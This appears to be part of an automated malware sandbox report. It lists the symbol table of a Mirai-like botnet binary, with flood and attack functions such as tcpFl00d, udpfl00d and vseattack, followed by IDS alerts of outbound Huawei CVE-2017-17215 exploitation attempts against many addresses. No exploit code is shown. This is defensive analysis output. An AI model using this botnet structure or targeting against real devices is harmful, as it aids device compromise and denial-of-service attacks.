                                            strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strerror_r.symtab0x8050e68191FUNC<unknown>DEFAULT2
                                            strlen.symtab0x8050d3019FUNC<unknown>DEFAULT2
                                            strlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strncpy.symtab0x8050d4438FUNC<unknown>DEFAULT2
                                            strncpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strnlen.symtab0x8050d6c24FUNC<unknown>DEFAULT2
                                            strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strpbrk.symtab0x805513c35FUNC<unknown>DEFAULT2
                                            strpbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strrchr.symtab0x8054fc026FUNC<unknown>DEFAULT2
                                            strrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strspn.symtab0x80550c042FUNC<unknown>DEFAULT2
                                            strspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strstr.symtab0x8050d84197FUNC<unknown>DEFAULT2
                                            strstr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strtok.symtab0x8050f5422FUNC<unknown>DEFAULT2
                                            strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strtok_r.symtab0x80550ec80FUNC<unknown>DEFAULT2
                                            strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            strtol.symtab0x80527c423FUNC<unknown>DEFAULT2
                                            strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            sysconf.symtab0x8052a80523FUNC<unknown>DEFAULT2
                                            sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            szprintf.symtab0x804a29636FUNC<unknown>DEFAULT2
                                            table.symtab0x80637c0232OBJECT<unknown>DEFAULT12
                                            table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            table_init.symtab0x804e75c468FUNC<unknown>DEFAULT2
                                            table_key.symtab0x805c8004OBJECT<unknown>DEFAULT11
                                            table_lock_val.symtab0x804e96553FUNC<unknown>DEFAULT2
                                            table_retrieve_val.symtab0x804e99a52FUNC<unknown>DEFAULT2
                                            table_unlock_val.symtab0x804e93053FUNC<unknown>DEFAULT2
                                            tcgetattr.symtab0x8050f8896FUNC<unknown>DEFAULT2
                                            tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            tcpFl00d.symtab0x804b4471138FUNC<unknown>DEFAULT2
                                            tcpcsum.symtab0x804ae71171FUNC<unknown>DEFAULT2
                                            time.symtab0x804f6b016FUNC<unknown>DEFAULT2
                                            time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            times.symtab0x8053a0816FUNC<unknown>DEFAULT2
                                            times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            toggle_obf.symtab0x804ea27237FUNC<unknown>DEFAULT2
                                            tolower.symtab0x804f6c029FUNC<unknown>DEFAULT2
                                            tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            toupper.symtab0x804f6e029FUNC<unknown>DEFAULT2
                                            toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            trim.symtab0x8049be2183FUNC<unknown>DEFAULT2
                                            type_codes.symtab0x805ac8c24OBJECT<unknown>DEFAULT4
                                            type_sizes.symtab0x805aca412OBJECT<unknown>DEFAULT4
                                            udpfl00d.symtab0x804af9a1197FUNC<unknown>DEFAULT2
                                            uname.symtab0x80570ac39FUNC<unknown>DEFAULT2
                                            uname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            unknown.1474.symtab0x805acd014OBJECT<unknown>DEFAULT4
                                            unsafe_state.symtab0x805c95020OBJECT<unknown>DEFAULT11
                                            uppercase.symtab0x804a89251FUNC<unknown>DEFAULT2
                                            userID.symtab0x805c7f44OBJECT<unknown>DEFAULT11
                                            usleep.symtab0x8052c8c47FUNC<unknown>DEFAULT2
                                            usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            util_atoi.symtab0x804ecc4424FUNC<unknown>DEFAULT2
                                            util_fdgets.symtab0x804f157129FUNC<unknown>DEFAULT2
                                            util_isalpha.symtab0x804f20557FUNC<unknown>DEFAULT2
                                            util_isdigit.symtab0x804f27745FUNC<unknown>DEFAULT2
                                            util_isspace.symtab0x804f23e57FUNC<unknown>DEFAULT2
                                            util_isupper.symtab0x804f1d845FUNC<unknown>DEFAULT2
                                            util_itoa.symtab0x804ee6c253FUNC<unknown>DEFAULT2
                                            util_local_addr.symtab0x804f0a6177FUNC<unknown>DEFAULT2
                                            util_memcpy.symtab0x804ec7347FUNC<unknown>DEFAULT2
                                            util_memsearch.symtab0x804ef69116FUNC<unknown>DEFAULT2
                                            util_strcat.symtab0x804ec4744FUNC<unknown>DEFAULT2
                                            util_strcmp.symtab0x804ebae106FUNC<unknown>DEFAULT2
                                            util_strcpy.symtab0x804ec1847FUNC<unknown>DEFAULT2
                                            util_stristr.symtab0x804efdd201FUNC<unknown>DEFAULT2
                                            util_strlen.symtab0x804eb1440FUNC<unknown>DEFAULT2
                                            util_strncmp.symtab0x804eb3c114FUNC<unknown>DEFAULT2
                                            util_zero.symtab0x804eca234FUNC<unknown>DEFAULT2
                                            vfork.symtab0x8052d1056FUNC<unknown>DEFAULT2
                                            vseattack.symtab0x804be0f1254FUNC<unknown>DEFAULT2
                                            vsnprintf.symtab0x804f988172FUNC<unknown>DEFAULT2
                                            vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            w.symtab0x8060ad04OBJECT<unknown>DEFAULT12
                                            waitpid.symtab0x805334091FUNC<unknown>DEFAULT2
                                            watchdog_maintain.symtab0x8049a5e277FUNC<unknown>DEFAULT2
                                            watchdog_pid.symtab0x805caa44OBJECT<unknown>DEFAULT12
                                            wcrtomb.symtab0x8053e9063FUNC<unknown>DEFAULT2
                                            wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            wcsnrtombs.symtab0x8053eec128FUNC<unknown>DEFAULT2
                                            wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            wcsrtombs.symtab0x8053ed027FUNC<unknown>DEFAULT2
                                            wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            wildString.symtab0x804a721310FUNC<unknown>DEFAULT2
                                            write.symtab0x805328091FUNC<unknown>DEFAULT2
                                            x.symtab0x8060ac44OBJECT<unknown>DEFAULT12
                                            xdigits.4985.symtab0x805bd6c17OBJECT<unknown>DEFAULT4
                                            xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                            y.symtab0x8060ac84OBJECT<unknown>DEFAULT12
                                            z.symtab0x8060acc4OBJECT<unknown>DEFAULT12
                                            zprintf.symtab0x804a27434FUNC<unknown>DEFAULT2
                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            06/14/24-10:44:33.149140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5389437215192.168.2.1441.0.175.187
                                            06/14/24-10:43:54.181929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5376237215192.168.2.1441.116.134.73
                                            06/14/24-10:44:06.470727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599037215192.168.2.14156.3.219.252
                                            06/14/24-10:44:29.022201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980237215192.168.2.14156.186.207.242
                                            06/14/24-10:43:34.661691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793637215192.168.2.14197.45.165.234
                                            06/14/24-10:44:33.132407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4976037215192.168.2.14156.123.27.236
                                            06/14/24-10:43:36.728310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488437215192.168.2.14156.236.158.214
                                            06/14/24-10:43:54.184678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411837215192.168.2.1441.9.132.12
                                            06/14/24-10:43:48.028318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175037215192.168.2.14156.172.47.88
                                            06/14/24-10:44:22.860010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492437215192.168.2.1441.109.95.11
                                            06/14/24-10:43:36.702134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465037215192.168.2.14156.78.23.43
                                            06/14/24-10:44:08.518603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081437215192.168.2.14156.223.239.117
                                            06/14/24-10:44:35.179418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118037215192.168.2.14156.22.118.195
                                            06/14/24-10:43:39.791298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460837215192.168.2.1441.150.202.80
                                            06/14/24-10:44:08.517331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010637215192.168.2.1441.141.231.209
                                            06/14/24-10:44:22.861589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943237215192.168.2.1441.122.41.78
                                            06/14/24-10:44:08.521546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575637215192.168.2.1441.194.48.33
                                            06/14/24-10:44:16.715339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856037215192.168.2.14156.163.240.151
                                            06/14/24-10:44:16.735154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095037215192.168.2.1441.119.80.38
                                            06/14/24-10:44:02.386232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551037215192.168.2.14156.189.84.115
                                            06/14/24-10:44:10.564279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606437215192.168.2.14197.235.221.75
                                            06/14/24-10:43:56.224891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352237215192.168.2.14197.102.81.28
                                            06/14/24-10:44:06.453695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771037215192.168.2.14197.101.193.208
                                            06/14/24-10:43:54.184924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309037215192.168.2.1441.243.76.131
                                            06/14/24-10:43:43.943209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5664837215192.168.2.14197.66.23.255
                                            06/14/24-10:43:58.290738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4248237215192.168.2.14197.67.242.174
                                            06/14/24-10:44:26.986238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736437215192.168.2.14156.212.131.71
                                            06/14/24-10:44:12.645416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580037215192.168.2.1441.190.41.89
                                            06/14/24-10:43:34.661622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198037215192.168.2.1441.161.125.211
                                            06/14/24-10:44:20.806896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040837215192.168.2.14156.209.5.74
                                            06/14/24-10:43:36.703489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4771637215192.168.2.14197.108.0.223
                                            06/14/24-10:43:34.660818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5111637215192.168.2.14197.115.91.80
                                            06/14/24-10:44:04.419567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525637215192.168.2.14156.77.139.14
                                            06/14/24-10:44:24.915343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901237215192.168.2.1441.242.211.54
                                            06/14/24-10:43:52.164703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113437215192.168.2.14197.138.254.255
                                            06/14/24-10:44:29.011512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473437215192.168.2.14197.32.169.167
                                            06/14/24-10:43:56.244271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711037215192.168.2.14197.37.228.248
                                            06/14/24-10:44:26.999448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894837215192.168.2.14197.20.251.222
                                            06/14/24-10:44:33.147929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638437215192.168.2.1441.38.55.110
                                            06/14/24-10:43:45.967393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4994037215192.168.2.1441.76.85.193
                                            06/14/24-10:44:00.321789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396837215192.168.2.1441.79.76.164
                                            06/14/24-10:44:22.878851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5180637215192.168.2.1441.154.55.21
                                            06/14/24-10:43:54.182925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341237215192.168.2.1441.19.217.180
                                            06/14/24-10:44:10.542917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052437215192.168.2.14197.20.57.237
                                            06/14/24-10:43:45.990936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705437215192.168.2.14156.79.171.243
                                            06/14/24-10:44:26.977199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5510037215192.168.2.1441.25.91.81
                                            06/14/24-10:44:31.052342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815637215192.168.2.14156.252.211.146
                                            06/14/24-10:43:39.791265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521837215192.168.2.1441.124.229.199
                                            06/14/24-10:43:50.115248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746037215192.168.2.14156.116.143.87
                                            06/14/24-10:44:00.326317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048237215192.168.2.14156.11.74.143
                                            06/14/24-10:44:22.861492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850637215192.168.2.14156.109.161.247
                                            06/14/24-10:43:52.146587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065837215192.168.2.14156.74.196.151
                                            06/14/24-10:44:06.471333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771237215192.168.2.1441.180.251.116
                                            06/14/24-10:44:06.470989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663037215192.168.2.1441.104.28.229
                                            06/14/24-10:44:10.568295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087237215192.168.2.14197.128.25.224
                                            06/14/24-10:43:39.812857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421237215192.168.2.14197.19.80.99
                                            06/14/24-10:43:41.896269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040437215192.168.2.14197.248.137.205
                                            06/14/24-10:44:02.384036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458837215192.168.2.14156.92.77.187
                                            06/14/24-10:44:10.548173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567837215192.168.2.14197.132.165.138
                                            06/14/24-10:44:14.666331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153437215192.168.2.1441.219.222.164
                                            06/14/24-10:44:10.563999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137037215192.168.2.1441.236.9.146
                                            06/14/24-10:44:08.519013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172637215192.168.2.1441.213.147.241
                                            06/14/24-10:44:33.151765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236637215192.168.2.14156.192.20.95
                                            06/14/24-10:43:56.243420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459637215192.168.2.1441.175.127.33
                                            06/14/24-10:43:34.677782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4890037215192.168.2.14156.172.161.20
                                            06/14/24-10:44:04.424912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637037215192.168.2.1441.206.47.108
                                            06/14/24-10:43:34.678880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3647637215192.168.2.1441.127.142.60
                                            06/14/24-10:44:02.382719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915237215192.168.2.14156.151.237.161
                                            06/14/24-10:44:33.134625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859637215192.168.2.1441.241.28.106
                                            06/14/24-10:43:36.729850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201837215192.168.2.14197.195.114.208
                                            06/14/24-10:44:18.762143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015837215192.168.2.14156.17.174.180
                                            06/14/24-10:43:48.019184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014037215192.168.2.14197.44.74.228
                                            06/14/24-10:43:41.850762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391837215192.168.2.14197.75.132.120
                                            06/14/24-10:43:48.019460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842437215192.168.2.1441.49.233.252
                                            06/14/24-10:44:14.671694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515437215192.168.2.14197.153.130.123
                                            06/14/24-10:44:29.025040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146037215192.168.2.1441.213.209.134
                                            06/14/24-10:43:58.290678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5999637215192.168.2.1441.187.45.28
                                            06/14/24-10:43:48.032642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5992637215192.168.2.1441.136.240.84
                                            06/14/24-10:43:56.228841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534437215192.168.2.14197.94.58.131
                                            06/14/24-10:43:41.899108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959037215192.168.2.1441.59.227.209
                                            06/14/24-10:44:14.668602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077637215192.168.2.14197.207.239.219
                                            06/14/24-10:44:22.862414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877237215192.168.2.1441.241.239.162
                                            06/14/24-10:44:10.565233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071437215192.168.2.14156.30.25.167
                                            06/14/24-10:44:14.683463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567037215192.168.2.14197.168.219.215
                                            06/14/24-10:44:10.563201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5322237215192.168.2.14197.164.118.83
                                            06/14/24-10:44:06.472235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6035837215192.168.2.14197.48.81.194
                                            06/14/24-10:44:00.326726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3704437215192.168.2.14156.92.99.222
                                            06/14/24-10:44:08.504985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983037215192.168.2.14197.18.97.119
                                            06/14/24-10:44:06.452430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3832237215192.168.2.14197.105.246.196
                                            06/14/24-10:44:16.732972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924237215192.168.2.14197.242.37.206
                                            06/14/24-10:43:41.849228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4173437215192.168.2.14156.178.127.53
                                            06/14/24-10:44:10.549517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668037215192.168.2.14156.246.205.14
                                            06/14/24-10:43:45.985208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373237215192.168.2.14197.11.217.221
                                            06/14/24-10:44:31.092965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3696837215192.168.2.14197.116.57.177
                                            06/14/24-10:44:22.861815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517637215192.168.2.1441.231.239.122
                                            06/14/24-10:44:22.880074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765437215192.168.2.14156.251.186.127
                                            06/14/24-10:44:22.861960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483837215192.168.2.1441.185.35.136
                                            06/14/24-10:43:36.703953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089237215192.168.2.14197.144.225.45
                                            06/14/24-10:44:06.470877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410037215192.168.2.14156.78.210.49
                                            06/14/24-10:44:14.685208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755437215192.168.2.14197.98.202.192
                                            06/14/24-10:44:18.776994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256037215192.168.2.14156.40.181.207
                                            06/14/24-10:43:36.701740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5298437215192.168.2.14156.95.70.142
                                            06/14/24-10:44:16.732651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257437215192.168.2.14156.10.155.85
                                            06/14/24-10:44:14.687577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5266037215192.168.2.1441.140.173.1
                                            06/14/24-10:43:48.034598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5253637215192.168.2.14197.167.18.174
                                            06/14/24-10:43:45.985454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663437215192.168.2.14197.94.213.216
                                            06/14/24-10:44:18.779772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372837215192.168.2.14156.139.109.139
                                            06/14/24-10:43:41.898031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980237215192.168.2.14156.74.28.27
                                            06/14/24-10:44:24.917975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6059637215192.168.2.1441.75.140.45
                                            06/14/24-10:43:58.274813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041037215192.168.2.14156.69.174.125
                                            06/14/24-10:44:02.381776TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039237215192.168.2.14156.161.106.61
                                            06/14/24-10:44:33.132119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436637215192.168.2.14156.150.32.75
                                            06/14/24-10:44:02.368177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491237215192.168.2.1441.29.74.105
                                            06/14/24-10:44:02.385013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690437215192.168.2.1441.116.129.244
                                            06/14/24-10:44:16.735238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689237215192.168.2.14156.143.38.44
                                            06/14/24-10:44:29.022302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744837215192.168.2.14197.245.53.129
                                            06/14/24-10:43:36.717895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3840437215192.168.2.14156.191.85.116
                                            06/14/24-10:43:36.722182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5708037215192.168.2.14197.188.181.168
                                            06/14/24-10:43:39.789260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190037215192.168.2.14156.104.120.118
                                            06/14/24-10:44:00.324245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074437215192.168.2.14197.255.216.86
                                            06/14/24-10:43:56.227948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3352437215192.168.2.1441.31.40.56
                                            06/14/24-10:43:56.228418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4841437215192.168.2.14156.236.144.64
                                            06/14/24-10:44:00.342745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975037215192.168.2.14156.132.246.61
                                            06/14/24-10:44:35.177242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256637215192.168.2.14156.69.120.178
                                            06/14/24-10:44:04.420838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571837215192.168.2.14156.208.20.159
                                            06/14/24-10:44:20.806467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175237215192.168.2.1441.211.23.136
                                            06/14/24-10:44:12.647361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783237215192.168.2.14156.3.149.138
                                            06/14/24-10:43:50.074413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496237215192.168.2.1441.79.109.37
                                            06/14/24-10:44:14.683192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948437215192.168.2.14156.103.42.103
                                            06/14/24-10:44:12.616576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3923837215192.168.2.14156.169.48.206
                                            06/14/24-10:44:00.324415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541637215192.168.2.1441.122.218.118
                                            06/14/24-10:43:36.705628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748437215192.168.2.14197.32.65.176
                                            06/14/24-10:43:43.941675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637037215192.168.2.14197.111.7.31
                                            06/14/24-10:44:04.423783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920437215192.168.2.14197.230.81.46
                                            06/14/24-10:44:12.647069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.14156.122.189.136
                                            06/14/24-10:44:31.087247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797837215192.168.2.14197.95.169.214
                                            06/14/24-10:43:36.724019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821237215192.168.2.14156.155.254.253
                                            06/14/24-10:44:20.827681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4067437215192.168.2.14197.199.208.6
                                            06/14/24-10:44:20.803270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643037215192.168.2.1441.59.124.117
                                            06/14/24-10:43:56.227718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981037215192.168.2.14197.151.84.214
                                            06/14/24-10:43:56.243793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874837215192.168.2.14156.144.114.201
                                            06/14/24-10:43:43.944090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984637215192.168.2.1441.126.169.85
                                            06/14/24-10:43:39.810672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448637215192.168.2.14197.209.191.166
                                            06/14/24-10:44:20.803379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4756437215192.168.2.14197.42.118.46
